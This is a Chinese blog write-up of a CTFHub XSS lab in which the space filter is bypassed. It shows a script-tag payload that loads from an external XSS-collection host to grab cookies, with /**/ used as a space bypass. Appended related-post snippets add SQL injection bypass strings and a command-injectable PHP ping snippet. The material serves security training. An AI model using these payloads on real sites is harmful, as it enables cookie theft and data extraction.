CTFHUB技能树之XSS——过滤空格

于 2024-10-21 17:06:50 发布
阅读量844 收藏 1
点赞数 10
CC 4.0 BY-SA版权
分类专栏: XSS跨站脚本攻击 文章标签: xss 前端 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_73049307/article/details/143117215

开启靶场,打开链接:

看上去是GET传参,有点像反射型的那题

在第一个输入框中输入:

<sCRiPt sRC=//xs.pe/6b6></sCrIpT>

没什么反应,右键查看源代码:

发现<sCRiPt sRC=//xs.pe/6b6></sCrIpT>中的sCRiPt和sRC之间的空格消失了,对空格做了过滤处理

用/**/绕过:

<sCRiPt/**/sRC=//xs.pe/6b6></sCrIpT>

提交之后再复制地址栏中的URL,粘贴到第二个输入框中提交:

成功得到flag:

ctfhub{5f10e129d697165a8083b5be}

CTFhub(eval执行,无过滤过滤cat,过滤空格过滤运算符)
ndjnddjxn的博客
04-02 1136
未发现什么,返回上一级目录?
5、ctfhub技能树_web_XSS
最新发布
YanLucyqi的博客
05-28 907
(2)存储型XSS,顾名思义是恶意参数被存储起来了,通常存储在后端服务器当中,所以存储型XSS在URL地址当中不会包含恶意参数。sRC%3D%2F%2Fxss.pt%2F4GDIfH%3E%3C%2FsCrIpT%3E,What’s your name输入,点击Send。sRC%3D%2F%2Fxss.pt%2F4GDIfH%3E%3C%2FsCrIpT%3E,点击Send。sRC%3D%2F%2Fxss.pt%2F4GDIfH%3E%3C%2FsCrIpT%3E,点击Send。
CTFHub | 过滤空格
尼泊罗河伯的博客
06-20 1251
检查网页源代码发现这题如果有空格就不会执行,说明这题对空格做了过滤处理。同样在输入框中输入 IP 进行测试,可以正常回显。
ctfhub-过滤空格
m0_62094846的博客
12-15 1091
<?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/ /", $ip, $m)) { $cmd = "ping -c 4 {$ip}"; exec($cmd, $res); } else { $res = $m; }...
过滤空格ctfhub
2401_82985722的博客
04-02 740
注释过滤 /**/、/*!*/、//、#、--括号过滤 ()符号过滤 %00、%09、%20、%a0 %0a、%0b、%0c、%0d引号过滤 ' 、 "大小写过滤 大小写双关键字绕过 '+'正则表达式绕过 \s、\s*\s+ 表示匹配一个或多个空白字符,\s* 表示匹配零个或多个空白字符。
CTFHub靶场————XSS
qq_61579604的博客
10-17 421
写入代码查看是否出现弹窗,查看源码发现存在xss但需要闭合后才可以出现弹窗。放入脚本,使用$.getScript功能是异步加载并执行。查看脚本注意闭合(利用xss平台的脚本代码)检查是否存在弹窗,可以放在url地址栏上执行。去平台查看cookie获取flag。检测是否出现弹窗利用双写绕过过滤。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。写入代码查看是否出现弹窗。插入脚本后将网址输入。
ctf刷题记录
enhengzZ的博客
04-23 1597
基础认证题 页面中依据提示 可猜测用户为admin 可弱口令尝试(admin)------失败 暴脾气,,,词典爆破! 下载其页面提供的词典 抓包处对上图circle处进行解密 在burp的decode模板中进行查询可知其加密方式为base64 载入词典 此处开始走弯路:1.词典所加载的均为密码,缺少用户名(发现问题后,度娘学习正则表达式,很好,又学了个奇奇怪怪的姿势)2.词典爆破后一直都是401返回,长度均为404,没有出现200返回(原因未明) ----------------------------
kali密码破解笔记
fhl5203的博客
11-01 3142
密码破解 思路 目标系统实施了强安全措施 ·安装了所有补丁 ·无任何已知漏洞 ·无应用层漏洞 ·攻击面最小化 社会工程学 获取目标系统用户身份 ·非授权用户不受信,认证用户可以访问守信资源 ·已有用户账号权限受限,需要提权 ·不会触发系统报警 身份认证方法 证明你是你声称你是的那个人 ·你知道什么(账号密码、pin、passphrase) ·你有什么(令牌、token、key、证书、密宝、手机) ...
CTFHub——XSS
2302_79119987的博客
03-28 2179
"fangfa('可控点')"> 使用 ” 闭合:与上题解题思路一致,用插入语句后用xss平台找到flag,插入语句后发现无回显(模拟黑客发送xss到服务器),查找源码,发现插入成功。将xss代码输入测试栏,发现url地址有变化,将url地址复制到url地址栏,上传成功后在xss平台查看cookie。尝试注入,查看源码发现过滤空格,url地址不对,使用/**/过滤
CTFHUB-过滤空格
Web学习之路
03-28 417
替换
CTFHUB技能树之SQL——过滤空格
weixin_73049307的博客
10-18 1303
在sqlmap/tamper目录下有个space2comment.py脚本,可以将空格替换成/**/看样子可能不在数据库中,老样子,改成-1/**/union/**/select/**/1,2#(如果爆的速度有点慢就加上--threads=10)得知mksymzfdit表和news表。用/**/或%0a替代空格。得知pttmgmuffp列。无回显,说明是整数型注入。得知数据库名是sqli。
CTFhub】命令注入—过滤空格
manerzi的博客
10-25 884
CTFhub】命令注入—过滤空格
CTFHub-过滤空格
m0_51589948的博客
05-19 763
过滤空格 在输入正常的数字时发现页面不发生回显,但是当用/**/过滤空格时发现页面可以回显并且能生出信息 可以判断该注入应为空格过滤,将所有的空格转化为//后进行查询flag,查询库名 -1//union//select//database() 查询该库名下的数据表 -1//union//select//1,group//select(table_name)//from//information_schema.tables//where//schema_table=‘sqli’ 得出表名为news
CTFhub 过滤空格
plant1234的博客
06-18 1010
过滤空格: 首先这题,我们得知道用/**/来代替我们语句中的空格 进行注入 首先启动环境用: 1' 1'/**/and/**/1=1# 1/**/and/**/1=1 1/**/and/**/1=2 测出是否有注入 然后就报出库名: 520/**/union/**/select/**/1,database() 在报出表名: 在报出字段: 在报出内容得到flag: ...
CTFHUB-SQL注入-过滤空格
weixin_68416970的博客
08-15 344
CTFHUB-SQL注入-过滤空格的过关教程
CTFHUB-技能树-Web题-SQL注入-Mysql结构-过滤空格
Static______的博客
04-10 663
得到数据库名为sqli,根据当前数据库名得到数据库下的表名。注:%09 %0A %0D +据说也可以替代空格。得到第一张表中的字段名,根据字段名获取数据。由此判断字段数为2(当前表的列数为2)得到两张表名,尝试查看第一张表的数据。
CTFhubxss漏洞
weixin_46954909的博客
05-15 1125
前期了解:上半部分是用户执行的操作,下半部分是模拟服务器的操作。
PHP 过滤空格
dasu的博客
06-08 572
注意: 字符串编码是否与当前文件编码一致 需要过滤(常规空格与全角空格) // 转换编码(如果编码不一致的情况) $str = iconv("gb2312", 'utf-8', $str); // 情况一:过滤字符串中所有的空格 $str = str_replace([' ',' '], '', $str); // 情况二:过滤字符串头尾的空格 $str = trim($str,"  ...
ctfhub 技能树web xss
01-10
### CTFHub Web技能树 XSS 学习路径和挑战 #### 了解XSS的基础概念 跨站脚本攻击(Cross-Site Scripting, XSS)是一种常见的Web安全漏洞,允许攻击者向其他用户的浏览器注入恶意脚本。这种类型的攻击可以分为三类:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值